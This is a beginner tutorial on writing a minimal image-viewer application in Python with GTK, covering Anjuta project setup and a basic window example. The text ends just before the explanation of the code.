- Colquitt JA et al (2001) Justice at the millennium: a meta-analytic review of 25 years of organizational justice research. J Appl Psychol 86(3):425–445CrossRefGoogle Scholar
- Cropanzano R, Folger R (1989) Referent cognitions and task decision autonomy: beyond equity theory. J Appl Psychol 74(2):293–299CrossRefGoogle Scholar
- Cugueró-Escofet N, Rosanas JM (2013) The just design and use of management control systems as requirements for goal congruence. Manage Acc Res 24(1):23–40CrossRefGoogle Scholar
- Dai NT, Kuang XJ, Tang G (2018) Differential weighting of objective versus subjective measures in performance evaluation: experimental evidence. Eur Acc Rev 27(1):129–148CrossRefGoogle Scholar
- Deci EL, Ryan RM (2000) The “what” and “why” of goal pursuits: human needs and the self-determination of behaviour. Psychol Inq 11(4):227–268CrossRefGoogle Scholar
- Deci EL et al (2001) Need satisfaction, motivation, and well-being in the work organizations of a former Eastern bloc country: a cross-cultural study of self-determination. Pers Soc Psychol Bull 27(8):930–942CrossRefGoogle Scholar
- Ederhof M (2010) Discretion in bonus plans. Acc Rev 85(6):1921–1949CrossRefGoogle Scholar
- Eisenhardt KM (1989) Agency theory: an assessment and review. Acad Manage Rev 14(1):57–74Google Scholar
- Engellandt A, Riphahn RT (2011) Evidence on incentive effects of subjective performance evaluations. Ind Labor Relat Rev 64(2):241–257CrossRefGoogle Scholar
- Franco-Santos M, Lucianetti L, Bourne M (2012) Contemporary performance measurement systems: a review of their consequences and a framework for research. Manage Acc Res 23(2):79–119CrossRefGoogle Scholar
- Frederiksen A, Lange F, Kriechel B (2017) Subjective performance evaluations and employee careers. J Econ Behav Organ 134:408–429CrossRefGoogle Scholar
- Gagné M, Deci EL (2005) Self-determination theory and work motivation. J Org Behav 26(4):331–362CrossRefGoogle Scholar
- Gagné M, Forest J (2008) The study of compensation systems through the lens of self-determination theory: reconciling 35 years of debate. Can Psychol 49(3):225–232CrossRefGoogle Scholar
- Gagné M et al (2010) The motivation at work scale: validation evidence in two languages. Educ Psychol Measur 70(4):628–646CrossRefGoogle Scholar
- Gagné M et al (2015) The multidimensional work motivation scale: validation evidence in seven languages and nine countries. Eur J Work Org Psychol 24(2):178–196CrossRefGoogle Scholar
- Gibbs M et al (2004) Determinants and effects of subjectivity in incentives. Acc Rev 79(2):409–436CrossRefGoogle Scholar
- Goldman BM (2003) The application of referent cognitions theory to legal-claiming by terminated workers: the role of organizational justice and anger. J Manage 29(5):705–728Google Scholar
- Golman R, Bhatia S (2012) Performance evaluation inflation and compression. Acc Organ Soc 37(8):534–543CrossRefGoogle Scholar
- Greenberg J, Ashton-James CE, Ashkanasy NM (2007) Social comparison processes in organizations. Organ Behav Hum Decis Process 102(1):22–41CrossRefGoogle Scholar
- Hannan RL et al (2013) The effect of relative performance information on performance and effort allocation in a multi-task environment. Acc Rev 88(2):553–575CrossRefGoogle Scholar
- Hartmann FGH, Slapničar S (2012a) Pay fairness and intrinsic motivation: the role of pay transparency. Int J Hum Resour Man 23(20):4283–4300CrossRefGoogle Scholar
- Hartmann FGH, Slapničar S (2012b) The perceived fairness of performance evaluation: the role of uncertainty. Manage Acc Res 23(1):17–33CrossRefGoogle Scholar
- Hartmann FGH, Naranjo-Gil D, Perego P (2010) The effects of leadership styles and use of performance measures on managerial work-related attitudes. Eur Acc Rev 19(2):275–310CrossRefGoogle Scholar
- Hayes AF (2013) Introduction to mediation, moderation, and conditional process analysis: a regression-based approach. The Guilford Press, New YorkGoogle Scholar
- Hayes AF, Montoya AK, Rockwood NJ (2017) The analysis of mechanisms and their contingencies: pROCESS versus structural equation modeling. Australas Market J 25(1):76–81CrossRefGoogle Scholar
- Höppe F, Moers F (2011) The choice of different types of subjectivity in CEO annual bonus contracts. Acc Rev 86(6):2023–2046CrossRefGoogle Scholar
- Ittner CD, Larcker DF, Meyer MW (2003) Subjectivity and the weighting of performance measures: evidence from a balanced scorecard. Acc Rev 78(3):725–758CrossRefGoogle Scholar
- Kampkötter P, Sliwka D (2016) The complementary use of experiments and field data to evaluate management practices: the case of subjective performance evaluations. J Inst Theor Econ 172(2):364–389CrossRefGoogle Scholar
- Kampkötter P, Sliwka D (2017) More dispersion, higher bonuses? The role of differentiation in subjective performance evaluations. J Labor Econ (in press) Google Scholar
- Kunz J (2015) Objectivity and subjectivity in performance evaluation and autonomous motivation: an exploratory study. Manage Acc Res 27:27–46CrossRefGoogle Scholar
- Kunz J, Linder S (2012) Organizational control and work effort-another look at the interplay of rewards and motivation. Eur Acc Rev 21(3):591–621Google Scholar
- Kunz AH, Pfaff D (2002) Agency theory, performance evaluation, and the hypothetical construct of intrinsic motivation. Acc Organ Soc 27(3):275–295CrossRefGoogle Scholar
- Lau CM, Tan SLC (2006) The effects of procedural fairness and interpersonal trust on job tension in budgeting. Manage Acc Res 17(2):171–186CrossRefGoogle Scholar
- Liebe U et al (2017) Using factorial survey experiments to measure attitudes, social norms, and fairness concerns in developing countries. Sociol Methods Res (in press) Google Scholar
- Linder S (2016) Fostering strategic renewal: monetary incentives, merit-based promotions, and engagement in autonomous strategic action. J Manag Control 27(2–3):251–280CrossRefGoogle Scholar
- Luft J (2016) Cooperation and competition among employees: experimental evidence on the role of management control systems. Manage Acc Res 31:75–85CrossRefGoogle Scholar
- McFarlin DB, Sweeney PD (1992) Distributive and procedural justice as predictors of satisfaction with personal and organizational outcomes. Acad Manage J 35(3):626–637CrossRefGoogle Scholar
- Moers F (2005) Discretion and bias in performance evaluation: the impact of diversity and subjectivity. Acc Organ Soc 30(1):67–80CrossRefGoogle Scholar
- Newman AH, Tafkov ID (2014) Relative performance information in tournaments with different prize structures. Acc Organ Soc 39(5):348–361CrossRefGoogle Scholar
- Prendergast C (1999) The provision of incentives in firms. J Econ Lit 37(1):7–63CrossRefGoogle Scholar
- Rajan MV, Reichelstein S (2006) Subjective performance indicators and discretionary bonus pools. J Acc Res 44(3):585–618CrossRefGoogle Scholar
- Tafkov ID (2013) Private and public relative performance information under different compensation contracts. Acc Rev 88(1):327–350CrossRefGoogle Scholar
- van den Bos K, van Prooijen J-W (2001) Referent cognitions theory: the role of closeness of reference points in the psychology of voice. J Pers Soc Psychol 81(4):616–626CrossRefGoogle Scholar
- Van den Broeck A et al (2010) Capturing autonomy, competence, and relatedness of the work-related basic need satisfaction scale. J Occup Org Psychol 83(4):981–1002CrossRefGoogle Scholar
- Van der Stede WA, Chow CW, Lin TW (2006) Strategy, choice of performance measures, and performance. Behav Res Acc 18:185–205CrossRefGoogle Scholar
- Voußem L, Kramer S, Schäffer U (2016) Fairness perceptions of annual bonus payments: the effects of subjective performance measures and the achievement of bonus targets. Manage Acc Res 30:32–46CrossRefGoogle Scholar
- Woods A (2012) Subjective adjustments to objective performance measures: the influence of prior performance. Acc Organ Soc 37(6):403–425CrossRefGoogle Scholar
- Zapata-Phelan CP et al (2009) Procedural justice, interactional justice, and task performance: the mediating role of intrinsic motivation. Organ Behav Hum Dec Process 108(1):93.
|
https://link.springer.com/article/10.1007/s11573-018-0908-6
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
@.;-)
markzz commented on 2015-05-28 23:35
Found new location for the archive. Updated package to 1.1.8-11.
markzz commented on 2015-05-28 22:21
And do you know of another location to get the tar archive... If not, this is not repairable.
rawa commented on 2015-05-28 22:03
Url to not working.
Returns:
No Such Resource
File not found.
fackamato commented on 2015-02-09 19:12
Yeah sorry my bad.
markzz commented on 2015-02-09 18:45
That seems like a problem with another package. Go to that package's page.
fackamato commented on 2015-02-09 18:43
error: 'libindicator-gtk3-*.pkg.tar.xz': could not find or read package
Edit libappindicator-gtk2 PKGBUILD with $EDITOR? [Y/n] n
==> Making package: libappindicator 12.10.0-4 (Mon 9 Feb 18:42:31 GMT 2015)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Missing dependencies:
-> libdbusmenu-gtk2
==> ERROR: Could not resolve all dependencies.
agus.aon commented on 2015-01-20 03:48
Hey, for anyone having trouble with some dependencies like lib32-libextx or something like that not found, you have to enable multilib repository on pacman by following this link:
cb474 commented on 2014-12-27 08:47
Yeah, the first thing I get when I install with yaourt is a request to replace libindicator with libindicator-gtk2.
I'm using the Mate desktop, is it okay to do this? Will it cause problems?
kaptoxic commented on 2014-12-19 13:01
For me, there are many conflicting files between libdbusmenu-glib and libdbusmenu-gtk2...
YAOMTC commented on 2014-12-05 05:55
As a KDE user, I found that redshift with this package works great:
vaikus commented on 2014-10-17 06:56
Having trouble starting fluxgui with the system. It kind of disapears from the XFCE panel after first setting it up and ticking the box so it would start with the system.
The .desktop file content looks like this:
[Desktop Entry]
Icon=fluxgui
Type=Application
Name=f.lux indicator applet
X-GNOME-Autostart-enabled=true
Exec=fluxgui
Hope it's solveable :)
markzz commented on 2014-10-08 04:00
Sorry for the delays (school and stuff), but I am still looking into it for desktops like KDE or other desktops other than GNOME (since I know it works with GNOME).
YAOMTC commented on 2014-10-05 23:21
Thanks! One more thing, after figuring out the gnome-settings-daemon.desktop issue I found that fluxgui still isn't autostarting. When I start KDE, I find /tmp/fluxgui_myname.pid exists again, which must mean it tried to start but failed. I'm guessing it's trying to start before gnome-settings-daemon can start, or finish starting?
markzz commented on 2014-10-05 22:57
gnome-settings-daemon is up to date in the 3.12 version. 3.14 will be released with the rest of GNOME 3.14. I am honestly a GNOME user (3.12) and have found that I have no issues. According to the issue on the git repository, it seems like something I can patch, so I'll get a test machine up to patch it and make the attempt to fix using your information. With the .desktop file, I'll add some information after the package is installed to fix that issue manually.
I suspect the reason the GNOME dependencies are there is because of the reason that this is based on the Ubuntu distribution and Unity was (or still is) based on gnome-shell.
YAOMTC commented on 2014-10-05 22:48
Scratch that, I can just run it as a regular user. My mistake. As for why it wasn't auto:48
Scratch that, I can just run it as a regular user. My mistake. As for why it wasn't:46
Scratch that, I can just run it as a regular user. As for why it wasn't running in KDE: /etc/xdg/autostart/gnome-settings-daemon specifies "OnlyShowIn=GNOME;" so I commented that out.
As for why gnome-settings-daemon is required to be running for fluxgui, that's still a mystery to me.
YAOMTC commented on 2014-10-05 20:21
I should clarify, I'm using KDE for my desktop. I found out that if I use dconf-editor to uncheck org/gnome/settings-daemon/plugins/cursor/active, and use kdesu instead of sudo to start gnome-settings-daemon, the cursor remains visible.
YAOMTC commented on 2014-10-05 19:56
I found the problem, I think. Found this:
So I installed gnome-settings-daemon, but couldn't find a way to run it. So I looked through the files and found an executable in /usr/lib/gnome-settings-daemon so I ran it but now my cursor is invisible. Anyway I then deleted /tmp/fluxgui_myname.pid and ran fluxgui again, and now it's working, but my cursor is still invisible and gnome-settings-daemon is still out of date:
and didn't autostart.
YAOMTC commented on 2014-10-02 02:49
I do have that installed, yes.
markzz commented on 2014-10-01 10:43
I do not have that error when launching this. Tell me, is lib32-glib2 installed? If not, try it and if it solves your problem, I'll add it as a dependency.
YAOMTC commented on 2014-10-01 06:13
I'm getting that error too when I try to launch it:
falmp commented on 2014-09-22 10:38
Alright, nevermind then. I'm using Manjaro and their packages are usually a bit late. From this thread on Chakra's forum, it seems to be a problem that will be solved eventually:
hobarrera commented on 2014-09-22 10:32
$ pacman -Qo /usr/lib/libgio-2.0.la
error: failed to read file '/usr/lib/libgio-2.0.la': No such file or directory
None for me, and it builds fine on my system.
falmp commented on 2014-09-22 10:31
The error seems to be a missing /usr/lib/libgio-2.0.la. Which package provides that package on your system?
pacman -Qo /usr/lib/libgio-2.0.la
That file does not come with lib32-glib2:
falmp commented on 2014-09-22 10:21
Yes, I do:
$ pacman -Qs lib32-glib2
local/lib32-glib2 2.40.0-1
Common C routines used by GTK+ 2.4 and other libs (32-bit)
Firelight commented on 2014-09-22 08:48
falmp, do you have lib32-glib2? It won't build without it.
falmp commented on 2014-09-21 10:35
markzz, just wanted to clarify that today I took the time to setup a new archlinux box (using a Vagrant image) and fluxgui installed fine. So I don't know what's up with my day to day archlinux installation, but it's indeed all good with your package. Thank you.
falmp commented on 2014-09-19 11:31
Alright, but I am up to date (pacman Suyy) and I do have base and base-devel installed. And I actually tried building it without packer:
The error is the same.
markzz commented on 2014-09-19 11:27
The link is the wiki's suggestions on what to do if a package won't build. They are good suggestions, and I would add trying to build it without packer.
It all builds fine with no errors on two computers.
falmp commented on 2014-09-19 11:08
markzz, not sure what you meant with the last link, but it seems to be an error with libappindicator. Can you confirm if it builds for you?
markzz commented on 2014-09-19 11:01
falmp commented on 2014-09-19 10:53
I guess there's still something off, but I think it's not fluxgui's fault. :(
markzz commented on 2014-09-19 10:46
Gotcha, updated PKGBUILD.
falmp commented on 2014-09-19 10:29
markzz, I still get this message:
Dependency `libappindicator' of `fluxgui' does not exist.
markzz commented on 2014-09-19 03:22
I have adopted and fixed it so that it will build and works on my computer. Please post if any more changes are needed.
falmp commented on 2014-09-17 09:35
Is it possible to disown this package so someone can adopt it and updated it? Right now it's not building.
rgoulter commented on 2014-08-24 04:55
Indeed, replacing libindicator with libindicator-gtk2, and libdbusmenu with libdbusmenu-glib fixed this for me, and were the only changes I needed to make.
hobarrera commented on 2014-06-17 07:10
@cemegginson: You probably need one of these:
cemegginson commented on 2014-06-17 05:54
It seems that libindicator was removed from the AUR so you can't build this package anymore.
sveno commented on 2014-05-03 11:57
I got it working with the following changes:
* Changing libdbusmenu to libdbusmenu-glib
* Changing lines 161/162 in /usr/lib/python2.7/site-packages/fluxgui/fluxgui.py from
theme = gtk.gdk.screen_get_default().get_setting( 'gtk-icon-theme-name')
to
theme = gtk.settings_get_default().get_property('gtk-icon-theme-name')
KillaB commented on 2014-03-06 00:06
yeah libappindicator is an AUR package so makepkg won't be able to install it automatically
sysfu commented on 2014-03-01 21:50
KillaB's PKGBUILD worked for me after I manually installed the libappindicator depencency. thx KB
infinitestratas commented on 2014-02-28 08:00
@KillaB didn't work for me ):
KillaB commented on 2014-02-28 02:16
Here's a working PKGBUILD:
anderraso commented on 2014-02-13 21:05
Gives me this error:
error: destino no encontrado: libdbusmenu
sender commented on 2014-02-10 07:57
FYI: I never got this package to work. Competent alternative:
hobarrera commented on 2014-02-10 01:54
Does anyone have a working PKGBUILD for this? I deleted the missing depend, but it still won't work:
$
acgtyrant commented on 2013-12-11 05:43
Update the dependence please! Otherwise I may adopt it O_O
casimir commented on 2013-12-03 18:48
'libdbusmenu' doesn't need to appear as dependence since it's one of 'libdbusmenu-gtk2'.
Freso commented on 2013-10-26 17:51
libdbusmenu is now libdbusmenu-glib.
ffjia commented on 2013-09-14 02:43
@SZoPer - this is really annoying, why upstream does not fix that?
hobarrera commented on 2013-08-03 23:36
I know what this is; this package provides two binaries, and only one of them requires ALL the dependencies; hence, they should be optdepends.
t3ddy commented on 2013-05-28 17:23
This is fluxgui not x.flux :)
hobarrera commented on 2013-05-28 10:21
A lot (most of) the dependencies should be optdepends, since they're only neccesary for fluxgui (but not for xflux)
luolimao commented on 2013-04-27 06:55
Shouldn't you be talking to the maintainer of libdbusmenu?
dk0r commented on 2013-04-27 05:57
==> ERROR: A failure occurred in build().
Aborting...
==> ERROR: Makepkg was unable to build libdbusmenu.
==> Restart building libdbusmenu ? [y/N]
==> ------------------------------------
==>
luolimao commented on 2013-04-08 22:42
Can you change the build() to a package()? It won't work under pacman 4.1 otherwise.
SZoPer commented on 2013-03-09 01:32
If anyone's having below error as well, try this old-but-still-valid advice:
$
t3ddy commented on 2012-12-14 09:38
Thanks!
However I recommend using redshift instead of f.lux ;)
kriation commented on 2012-12-14 01:09
I modified the PKGBUILD to depend on the packages below (in the order listed), and was successful in running fluxgui without the patch:
libindicator
libdbusmenu
libdbusmenu-gtk2
libappindicator
The packages above are in the AUR, and their dependencies are all handled through the Arch repositories.
The entire modified PKGBUILD is available here:
Anonymous comment on 2012-10-18 10:25
python-pexpect is now python2-pexpect
breed808 commented on 2012-09-09 11:10
Compiles and runs just fine. Thanks a lot!
donniezazen commented on 2012-08-28 06:17
pyxdg doesn't exist anymore.
t3ddy commented on 2011-01-31 15:33
I use redshift too :)
npouillard commented on 2011-01-31 15:03
In the mean time I've switched to redshift which is in the community repo, supports more screens with more colors...
t3ddy commented on 2011-01-31 10:50
updated according to silvik and npouillard suggestions
silvik commented on 2011-01-30 15:06
after installing this package I can't see the icon (only an X placeholder) - I'm on openbox if that matters.
after running gtk-update-icon-cache -q -t -f /usr/share/icons/hicolor and update-desktop-database -q it's ok.
I guess you need to include a fluxgui.install file that contains:
pkgname=fluxgui
post_install() {
gtk-update-icon-cache -q -t -f usr/share/icons/hicolor
update-desktop-database -q
}
post_upgrade() {
post_install
}
post_remove() {
post_install
}
npouillard commented on 2011-01-01 13:17
On x86_64 these packages are needed:
lib32-gcc-libs
lib32-glibc
lib32-libx11
lib32-libxau
lib32-libxcb
lib32-libxdmcp
lib32-libxext
lib32-libxxf86vm
alfplayer commented on 2010-12-13 23:10
Note: also includes the console version called "xflux".
hilton commented on 2010-11-19 18:30
Hello, please update this package to use python2-gconf from [extra]
instead of python-gconf which will be removed soon from AUR.
Cheers
t3ddy commented on 2010-11-02 10:27
This pkgbuild is giving me enough troubles and I neither use it.
Anyone wants to maintain it?
Anonymous comment on 2010-11-02 01:47
This requires lib32-libxxf86vm if you are running on x86_64. Otherwise, you get the following error when trying to execute xflux:
xflux: error while loading shared libraries: libXxf86vm.so.1: cannot open shared object file: No such file or directory
t3ddy commented on 2010-11-01 17:55
yes I know, just decide what you want...
lachlanc commented on 2010-11-01 17:22
works with gnome-python[extra] instead of python-gconf[aur]
t3ddy commented on 2010-10-26 12:27
ok, I've added it
w1ntermute commented on 2010-10-26 02:42
Yes, it's necessary, I get this error if I don't have it installed:
Traceback (most recent call last):
File "/usr/lib/python2.7/site-packages/fluxgui/fluxgui.py", line 5, in <module>
import gconf
ImportError: No module named gconf
t3ddy commented on 2010-10-17 19:17
Is it really needed?
I haven't it installed and fluxgui seems to work.
master commented on 2010-10-17 18:45
Please make it depend of python-gconf.
t3ddy commented on 2010-10-05 07:29
@ipha
I hope to have done well what you suggested, anyway, do you want to maintain this pkgbuild?
ipha commented on 2010-10-05 05:30
Needs pyxdg as a dependency and it needs to be run on python2 now that python defaults to python 3.
t3ddy commented on 2010-09-29 14:04
As you can read here: this version works only on ubuntu, so I've made a patch to make it run also on Arch.
Don't expect the patch to be well done, I know nothing about python, so if there's anyone interested in making a better patch, I'd be thankful.
|
https://aur.archlinux.org/packages/fluxgui/?comments=all
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
a WSDL interface from within JDeveloper by simply running a wizard.
Logical Connection Names
All adapters, whether these are used to connect to an FTP server or access an MQ-Series queue, use logical connection names or JNDI names that must be specified at design time. At runtime, the adapter framework uses these JNDI names for looking up the physical connection data from configuration files. This mechanism works well. It ensures that the software remains unchanged when dragging it through the various stages of the software development life-cycle process: from QA to SIT, to UAT and finally Production only the environment-specific configuration files have different data. Obviously, developers are required to stick to the naming conventions for the logical connection names.
Risky business
Unfortunately, for ‘convenience’ Oracle decided to place physical connection data in the generated WSDL files at design time. When the system is not able to obtain the connection details from the configuration files using the JNDI name, it will use the so called ManagedConnectionFactory or MCF properties from the WSDL instead. Risky business that may cause undesirable behavior: if there is a misconfiguration the service may connect to an instance that was specified at design time without you knowing that. I prefer a clear error on which a system administrator can act appropriately by fixing the connection details in the proper configuration file. Hence, as a rule, the MCF properties need to be removed from the generated WSDL files afterwards. For inspection of the connection properties in the WSDL files I created a simple Ant script.
Requirements
My initial requirement is simple: I want an overview of the connection data for all WSDL files in the project. Typically, these are listed in the WSDL files in the following format:
<!--/HR is missing. These 'mcf' properties are safe to remove. --> <service name="ReadDptData"> <port name="ReadDptData_pt" binding="tns:ReadDptData_binding"> <jca:address </port> </service>
Now, I want to check the contents of the <jca:address> element for each file. In a project I am currently working on that literally means plowing through hundreds of files. Hence, I need a utility that automates that tedious task for me. Since we already use Ant extensively, e.g. for deploying BPEL Processes and ESB Services, the utility is implemented as an Ant build script.
Loop Constructs and XML Tasks in Ant
Out of the Apache box, Ant does not come with looping constructs. Luckily the Ant-Contrib project provides very useful extensions to Ant among which is a foreach task that allows looping over a set of files. Subsequently, for each file I want to display the contents of of the <jca:address> element. Applying a simple XPath expression should do the trick. That is possible using the yet another Ant extension, XMLTask. Putting it all together results in the following script:
<?xml version="1.0" encoding="UTF-8"?> <project name="QA" default="list-connection-data-in-wsdl-files" basedir="."> <!-- QA Utilities for SOA components --> <property environment="env"/> <property name="server-src" value="${env.SOA_PROJECT_HOME}/work"/> <taskdef resource="net/sf/antcontrib/antcontrib.properties"> <classpath> <pathelement location="${env.SOA_DA_HOME}/lib/ant-contrib-1.0b3.jar"/> </classpath> </taskdef> <taskdef name="xmltask" classname="com.oopsconsultancy.xmltask.ant.XmlTask"> <classpath> <pathelement location="${env.SOA_DA_HOME}/lib/xmltask-v1.15.1.jar"/> </classpath> </taskdef> <target name="list-connection-data-in-wsdl-files"> <foreach target="list-connection-data-in-wsdl-file" param="source-file" > <path id="src.path"> <fileset dir="${server-src}"> <include name="**/*.wsdl"/> </fileset> </path> </foreach> </target> <target name="list-connection-data-in-wsdl-file"> <echo message="File name: ${source-file}" /> <xmltask source="${source-file}"> <copy path="descendant::*/:service/:port" buffer="connect-data-buffer"/> <print buffer="connect-data-buffer"/> </xmltask> </target> </project>
When using XPath expressions in XMLTask Ant targets, like descendant::*/:service/:port in this case, the colon character is used by XMLTask to deal with local namespaces in the WSDL file. As far as I know, there is no way to pass on namespaces data to XMLTask (I confess that I did not spent a lot of time investigating). XPath expressions /:service/:port/:address and /:service/:port/jca:address do not return the required results.
Room for improvements
The script that is provided here suits my needs. But as always there is room for improvements. For one, when it does not find a <jca:address> element it reports that whereas in that case we could opt for not even mentioning the file. Furthermore, the script could be extended to automatically remove all but the location attribute from the <jca:address> element. For that purpose, XMLTask provides options for manipulation of XML documents.
|
https://technology.amis.nl/2007/08/17/using-ant-to-inspect-connection-properties-in-wsdl-files-that-are-generated-by-oracle-soa-suite-adapters/
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Hello everyone, I am so close to achieving my goal with this program. I just can't seam to figure out where the for loop goes wrong and "mis-counts" the amount of consonants and vowels. Also, in the else...if statement if anyone has advise to make it so it excludes all characters (like !, -, ...etc) besides vowels that would help so much! Part of the consonant problem I believe is it is counting spaces and other characters maybe?
Thanks so much in advance for any help!
import java.lang.String; public class StringProcessor { String string; int vowels; int consonants; public void Count() { vowels = 0; consonants = 0; for(int i = 0; i < string.length(); i++) { char c = string.charAt(i); if(c == 'a' || c == 'e' || c == 'i' || c == 'o' || c == 'u') vowels++; else if(c != 'a' || c != 'e' || c != 'i' || c != 'o' || c != 'u' || c != ' ') consonants++; } } public void display() { System.out.println(string + " has " + vowels + " vowels and " + consonants + " consonants."); } public StringProcessor(String aString) { string = aString; } public void setString(String stString) { string = stString; } } public class TestProcessor { public static void main(String[] args) { StringProcessor processor = new StringProcessor("Java Rules"); processor.Count(); processor.display(); processor.setString("I like on-line classes"); processor.Count(); processor.display(); processor.setString("Spring break was AWESOME!"); processor.Count(); processor.display(); } }
The output is supposed to look like this:
"Java Rules" has 4 vowels and 5 consonants
"I like on-line classes" has 8 vowels and 10 consonants
"Spring break was AWESOME!" has 8 vowels and 13 consonants
And I get this:
Java Rules has 4 vowels and 6 consonants.
I like on-line classes has 7 vowels and 15 consonants.
Spring break was AWESOME! has 4 vowels and 21 consonants.
Thanks again!
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/7653-counting-vowels-consonants-string.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Now that it is needed since web2py exports already in CSV but you can do define
def export_xml(rows): idx=range(len(rows.colnames)) colnames=[item.replace('.','_') for item in rows.colnames] records=[] for row in rows.response: records.append(TAG['record'](*[TAG[colnames[i]](row[i]) for i in idx])) return str(TAG['records'](*records))
Now if you have a model like
db=SQLDB('sqlite://test.db') db.define_table('mytable',SQLField('myfield')) for i in range(100): db.mytable.insert(myfield=i)
you can get your data in XML by doing
print export_xml(db().select(db.mytable.ALL))
Notice that
TAG.name('a','b',c='d')
and
TAG['name']('a','b',c='d')
both generate the following XML
<name c="d">ab</name>
where 'a' and 'b' and 'd' are escaped as appropriate. Using TAG you can can generate any HTML/XML tag you need and is not already provided in the API. TAGs can be nested and are serialized with str()
|
http://www.web2py.com/AlterEgo/default/show/74
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
On Thu, 2003-07-31 at 13:42, Glenn Sieb wrote: > Jim Breton said: > > I have set up the above on a FreeBSD 4.7 system with the intention of > > being able to host per-virtual-domain mailing lists. > > Yay! Another FBSD user! :) > > > I want to be able to have: > > > > list01 at domain1.com > > and > > list01 at domain2.com > > > > as completely separate, autonomous lists. > > Can't do it :( It'd have to be: > > list01 at domain1.com > list02 at domain2.com > > If Mailman had a little more (no offense, I just can't think of a better > term to use) intelligence in it, when you set up for virtual domains it'd > do things like create a directorynamespace like > /usr/local/mailman/lists/domain2.com/, etc. so you *could* put lists with > the same name in different domains... Well, technically, you could have two or more parallel installs of Mailman. There are quite a few folks who do that when they have just a few virtual domains to worry about. Also, you can alias list01 at domain2.com ==> list01-domain2 And let the (hidden) real name of the list be list01-domain2. Of course then you have to do a lot of editing of the web-pages to display the domain information that you want. That is the way I normally do it. The webpages all aliases properly as do the email addresses, so the end-user is non the wiser. And yes, it sure would be easier if mailman used only the virtual host information when setting up it's web pages and sending out its emails. Good Luck
|
https://mail.python.org/pipermail/mailman-users/2003-July/030743.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
There is an open source program called MSWordView that is able to
convert a MS Word 97 table into HTML. I tried version 0.7.4 of abiword
and it does not handle tables well (if at all). I have a friend who
could end his dual boot days if he had a piece of software on Linux that
could import and export tables in MS Word 97 format. Is there a plan to
work on tables in the future, which has just not been begun? Didn't
there used to be a roadmap of features on the abisource web site? I
can't find it. Also, there was a great article at the inception of
Abiword about a certain feature that was in Word that would never be
included in Abiword. It was a feature that was incredibly obscure and
of little use to most people (if anyone). I can't find that article, if
anyone knows what I am babbling about. Anyway, back to my original
point. MSWordView's home page is at and it is GPL'd so the
Abiword developers should be able to use the code to improve the Word 97
import features. Maybe they already know about this code and it is just
incompatible with the abiword architecture. I don't know. I'd like to
know.
Keith Wear
|
http://www.abisource.com/mailinglists/abiword-user/99/August/0013.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
Microsoft .NET Framework 3.0 Programming Model
Microsoft .NET Framework 3.0, the managed programming model for Microsoft® Windows®, includes the .NET Framework 2.0, Windows Presentation Foundation, Windows Communication Foundation, and Windows Workflow Foundation.
The documentation, samples, and tools provided in this release are preliminary and subject to change. It is recommended that you use this preliminary release of the Windows SDK in a test environment.
Documentation - The documentation contains API reference topics, task-based, how-to documentation and feature overviews to help you understand how to use .NET Framework 3.0 APIs in an application. To locate the topics you need, you can use Search, Index, the Table of Contents, or the navigational topics in the documentation viewer.
Samples - The code samples are provided in one or more of the following languages: Visual Basic, C#, and C++. You can locate and view samples, organized by technology, by opening the Samples node in the TOC. The “Technology Samples” sub-nodes contain samples that are generally brief and focused around a particular aspect of a technology. The “Application Samples” sub-nodes contain samples that are larger and more complex applications that demonstrate how to use the API to construct a rich real-world application.
Tools - The Windows SDK includes an extensive set of tools to assist you in developing .NET Framework 3.0 applications.
Sending Feedback - We are in the early stages of creating the documentation and samples, and many topics are incomplete or do not yet exist. If you have suggestions for topics we should write or how we can improve the Windows SDK, please send them to us using the link available at the bottom of each topic in the documentation.
In This Section
- Feature Area Overviews
Find concept-based lists of relevant links to information about topics such as Presentation, Communication, Data Migration and Interoperability, and Security.
- .NET Framework Technologies
Find information about the .NET Framework 2.0, including what's new in this version of the .NET Framework, overviews, and guidelines and best practices.
- ASP.NET Web Applications
Find information about creating ASP.NET Web applications, developing custom server controls, and XML Web Services created using ASP.NET.
- Windows Forms
Find information about Windows Forms architecture, events, controls, data architecture, graphics, and drawing in Windows Forms.
- Windows Communication Foundation
Find information about using Windows Communication Foundation to develop reliable, secure, transacted services for communication between systems.
- Windows Presentation Foundation
Find information about building and deploying Windows Presentation Foundation applications, including the user interface, data binding, graphics and multimedia.
- Windows Workflow Foundation
Find information about building and deploying Windows Workflow Foundation applications.
- Samples
Find code examples for .NET Framework 3.0 technologies, including smaller technology-focused samples and larger application-type samples.
- .NET Framework 3.0 Tools
Information about the tools available with the SDK to make it easier for you to create and deploy managed applications and components that target .NET Framework 3.0.
- General Reference
Language reference information, compiler reference, and additional reference information for Windows Communication Foundation and Windows Workflow Foundation.
- Class Library
Contains syntax and examples for all public classes within the .NET Framework 3.0 API set.
|
https://msdn.microsoft.com/en-us/library/ms687300.aspx
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
In this tutorial, we're going to write a very simple GTK application that loads and displays an image file. You will learn how to:
Write a basic GTK user interface in Python
Deal with events by connecting signals to signal handlers
Lay out GTK user interfaces using containers
Load and display image files
You'll need the following to be able to follow this tutorial:
Before you start coding, you'll need to set up a new project in Anjuta. This will create all of the files you need to build and run the code later on. It's also useful for keeping everything together.
Start Anjuta and click File ▸ New ▸ Project to open the project wizard.
Choose PyGTK (automake) from the Python tab, click Continue, and fill out your details on the next few pages. Use image-viewer as project name and directory.
Be sure to disable Use GtkBuilder for user interface as we will build the user interface manually in this example. For an example of using the interface designer, check the Guitar-Tuner demo.
Click Apply and the project will be created for you. Open src/image_viewer.py from the Project or File tabs. It contains very basic example code.
Let's see what a very basic Gtk application looks like in Python:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
from gi.repository import Gtk, GdkPixbuf, Gdk import os, sys class GUI: def __init__(self): window = Gtk.Window() window.set_title ("Hello World") window.connect_after('destroy', self.destroy) window.show_all() def destroy(window, self): Gtk.main_quit() def main(): app = GUI() Gtk.main() if __name__ == "__main__": sys.exit(main())
Let's take a look at what's happening:
